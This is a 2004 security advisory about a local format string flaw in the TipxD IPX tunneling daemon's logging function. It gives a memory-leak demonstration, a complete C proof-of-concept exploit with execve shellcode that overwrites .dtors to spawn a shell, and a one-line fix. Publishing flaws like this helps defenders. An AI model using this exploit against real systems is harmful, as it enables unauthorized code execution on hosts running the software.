
nsg-advisory-08.txt

🗓️ 20 Nov 2004 00:00:00 · Reported by CoKi · Type: packetstorm

TipxD has a local format string vulnerability in its log function, affecting versions 1.1.1 and prior.

Code
`-------------------------------------------------  
No System Group - Advisory #03 - 15/11/04  
-------------------------------------------------  
Program: Tom's IPX Tunneling Daemon - TipxD  
Homepage: http://tipxd.sourceforge.net  
Vulnerable Versions: TipxD 1.1.1 and prior  
Risk: Low  
Impact: Local Format String Vulnerability  
-------------------------------------------------  
  
  
- DESCRIPTION  
-------------------------------------------------  
tipxd is an IPX tunneling daemon which snoops on   
a local network for IPX 802.3 traffic, packages   
it and sends it over one or many TCP/IP connections   
to tipxd running on remote machines where it is   
unpacked and sent via the local network. To the   
IPX networks, it then appears that the LANs are   
joined. This is a request for testing and bug-finding.   
It is intended for playing IPX based games where   
the remote machines are joined only by a TCP/IP   
network, and typically when the gaming machines   
are each behind a firewall.  
  
More information at: http://tipxd.sourceforge.net  
  
  
- DETAILS  
-------------------------------------------------  
tipxd is affected by a format string bug in the  
tipxd_log() function, at line 61 of src/log.c:  
  
--- log.c ---  
45: void tipxd_log(int priority, char *format, ... )  // NOTE(review): 'format' is expanded exactly once by vsnprintf below; the bug is in what happens to the result
46: {  
47: va_list ap;  
48: char log_entry[LOG_ENTRY_SIZE];  
49:   
50: /* Take the format and variables and expand them out into a string,  
51: so that we can pass it on to syslog if necessary. No buffer overflow,  
52: aren't I good? :)  
53: */  
54: va_start(ap,format);  // NOTE(review): ap is never released with va_end()
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);  // NOTE(review): from here on log_entry is plain data, and it may contain '%' from whatever was logged (e.g. a file name taken from the command line)
56:   
57: if (sysinfo.opt_flags & OPT_STDERR) {  
58: /* To do: add something useful like timestamping instead of silly pre-identifie  
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);  // NOTE(review): this branch is fine - literal format, log_entry is an argument
60: } else {  
61: syslog(priority,log_entry); // The format bug  -- NOTE(review): log_entry occupies syslog()'s format parameter, so any '%' directive inside it is interpreted
62: }  
63:  
64: return;  
65: }  
--- log.c ---  
  
We can show some parts of the stack memory by using a format string like  
this, because the configuration file name given with -C is logged through tipxd_log() and so ends up as the syslog() format:  
  
coki@servidor:~$ tipxd -C AAAA%08x  
Unable to open configuration file : No such file or directory  
  
coki@servidor:~$ tail -n 1 /var/log/messages  
Nov 15 11:03:40 servidor tipxd[8360]: Config file is AAAA0804c8d7  
coki@servidor:~$   
  
  
- EXPLOIT  
-------------------------------------------------  
  
------------------ tipxd_exp.c ------------------  
/* tipxd_exp.c  
  
TipxD Format String Vulnerability  
  
TipxD <= 1.1.1 local exploit (Proof of Concept)  
  
Tested in Slackware 9.0 / 9.1 / 10.0  
  
by CoKi <[email protected]>  
No System Group - http://www.nosystem.com.ar  
*/  
  
#include <stdio.h>  
#include <string.h>  
  
#define PATH "/bin/tipxd"  
#define OBJDUMP "/usr/bin/objdump"  
#define GREP "/usr/bin/grep"  
  
/* Payload bytes that main() places in the environment of the process it
 * spawns (see env[] there); the trailing bytes spell "/bin/sh". The author
 * attributes it to aleph1's 45-byte shellcode — presumably Linux/x86 execve,
 * not verified here. */
unsigned char shellcode[]= /* aleph1 shellcode.45b */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68";
  
int check(unsigned long addr);  
  
/*
 * Proof-of-concept driver for the tipxd_log() format string bug: tipxd hands
 * the already-expanded log text to syslog() as its *format* argument, so any
 * '%' directives in data it logs are interpreted. This program builds such a
 * string, passes it to tipxd as the -f config path and exec's the daemon.
 *
 * Assumes a 32-bit, non-ASLR Linux stack layout (see shaddr) and fixed tool
 * paths (PATH/OBJDUMP/GREP) — the author reports Slackware 9.0-10.0 only;
 * TODO confirm before reading anything into the hard-coded constants.
 * argc/argv are unused. Several calls below lack their headers (exit, bzero,
 * popen/execle) — implicit declarations with a modern compiler.
 */
int main(int argc, char *argv[]) {

int i, dtorsaddr;
unsigned int bal1, bal2, bal3, bal4;
char temp[512];
char buffer[1024];
char nop1[255], nop2[255];
char nop3[255], nop4[255];
int cn1, cn2, cn3, cn4;
FILE *f;
char *env[3] = {shellcode, NULL};   /* the payload is the child's only env var; shellcode is unsigned char[], so this is a pointer-type mismatch */
int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);   /* guessed address of the environment block — presumably the fixed stack top of pre-ASLR 32-bit Linux; TODO confirm */

/* finding .dtors address */
/* Shells out to objdump/grep at the hard-coded paths. popen()'s result is
 * never NULL-checked, so a missing tool crashes inside fscanf(). */
sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
f = popen(temp, "r");
if(fscanf(f, " %08x", &dtorsaddr) != 1) {
pclose(f);
printf("Cannot find .dtors address\n");
exit(1);   /* <stdlib.h> is not included: exit() is implicitly declared */
}
pclose(f);
dtorsaddr = dtorsaddr + 4;

printf("\n TipxD <= 1.1.1 local exploit (Proof of Concept)\n");
printf(" by CoKi <[email protected]>\n\n");
printf(" shellcode address = %.8p\n", shaddr);   /* int passed for %p: format/argument mismatch (UB in C11) */
printf(" .dtors address = %.8p\n\n", dtorsaddr); /* same mismatch */

bzero(temp, sizeof(temp));   /* bzero() comes from <strings.h>, which is not included */
bzero(buffer, sizeof(buffer));

strcat(buffer, "x");

/* adding .dtors address */
for(i = 0; i < 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &dtorsaddr);   /* int* handed to %s: the int's storage is read as a C string */
strncat(buffer, temp, 4);
dtorsaddr++;
}

/* convert shellcode address location */
/* The nopN arrays are zeroed first so the '\x90' runs below stay
 * NUL-terminated for the %s conversions in the sprintf — this relies on
 * every cnN being below 255. */
memset(nop1, 0, 255);
memset(nop2, 0, 255);
memset(nop3, 0, 255);
memset(nop4, 0, 255);

bal1 = (shaddr & 0xff000000) >> 24;   /* shaddr split into its four bytes, high to low */
bal2 = (shaddr & 0x00ff0000) >> 16;
bal3 = (shaddr & 0x0000ff00) >> 8;
bal4 = (shaddr & 0x000000ff);

cn1 = bal4 - 16 - 15 - 48 - 2 -1;   /* pad lengths derived from byte differences; check() wraps negatives into range */
cn1 = check(cn1);
cn2 = bal3 - bal4 - 2;
cn2 = check(cn2);
cn3 = bal2 - bal3 - 2;
cn3 = check(cn3);
cn4 = bal1 - bal2 - 2;
cn4 = check(cn4);

memset(nop1, '\x90', cn1);
memset(nop2, '\x90', cn2);
memset(nop3, '\x90', cn3);
memset(nop4, '\x90', cn4);

/* The "%%" escapes become literal '%' directives in temp — this text is what
 * tipxd will later treat as a format. sprintf() has no bound; temp is 512
 * bytes and the nopN runs are at most 255 each, so it fits only by size. */
sprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n\x90\x90\x90\x90"
,nop1, nop2, nop3, nop4);

strcat(buffer, temp);   /* unbounded, but "x" + 16 address bytes + temp (< 512) is within the 1024-byte buffer */

/* The crafted text is passed as tipxd's config path; presumably it is logged
 * through tipxd_log() like the -C name shown earlier, which is how it reaches
 * syslog()'s format argument. execle() only returns on failure, and that
 * return is not checked. */
execle(PATH, "tipxd", "-f", buffer, NULL, env);
}
  
/*
 * Wraps a pad length into the positive range: returns addr unchanged when its
 * "%d" rendering is >= 1, otherwise addr + 256. The snprintf/atoi round trip
 * is just a signed reinterpretation of the low int bits.
 *
 * Defects: an unsigned long is passed for %d (format/argument mismatch; UB
 * where long is wider than int), and the unsigned long result is narrowed
 * to the int return type. atoi() needs <stdlib.h>, which this file does not
 * include.
 */
int check(unsigned long addr) {
char tmp[128];
snprintf(tmp, sizeof(tmp), "%d", addr);
if(atoi(tmp) < 1)
addr = addr + 256;

return addr;
}
  
---------------- cherokee_exp.c -----------------  
  
coki@servidor:~$ make tipxd_exp  
coki@servidor:~$ ./tipxd_exp  
  
tipxd local exploit (Proof of Concept)  
by CoKi <[email protected]>  
  
shellcode address = 0xbfffffa7  
.dtors address = 0x0804fbe0  
  
Unable to open configuration file : File name too long  
  
sh-2.05b$  
  
This exploit does not give a root shell :(  
  
  
- SOLUTIONS  
-------------------------------------------------  
Change the tipxd_log() function in src/log.c as follows, so that log_entry is passed as an argument to a constant "%s" format instead of being used as the format itself:  
  
--- log.c ---  
45: void tipxd_log(int priority, char *format, ... )  
46: {  
47: va_list ap;  
48: char log_entry[LOG_ENTRY_SIZE];  
49:   
50: /* Take the format and variables and expand them out into a string,  
51: so that we can pass it on to syslog if necessary. No buffer overflow,  
52: aren't I good? :)  
53: */  
54: va_start(ap,format);  // NOTE(review): still no matching va_end(ap) before return
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);  
56:   
57: if (sysinfo.opt_flags & OPT_STDERR) {  
58: /* To do: add something useful like timestamping instead of silly pre-identifie  
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);  
60: } else {  
61: syslog(priority,"%s",log_entry); // The fix  -- NOTE(review): the format is now a constant and log_entry is an argument, so its contents are emitted verbatim
62: }  
63:  
64: return;  
65: }  
--- log.c ---  
  
  
- REFERENCES  
-------------------------------------------------  
http://www.nosystem.com.ar/advisories/advisory-08.txt  
  
  
- CREDITS  
-------------------------------------------------  
Discovered by CoKi <[email protected]>  
  
No System Group - http://www.nosystem.com.ar`
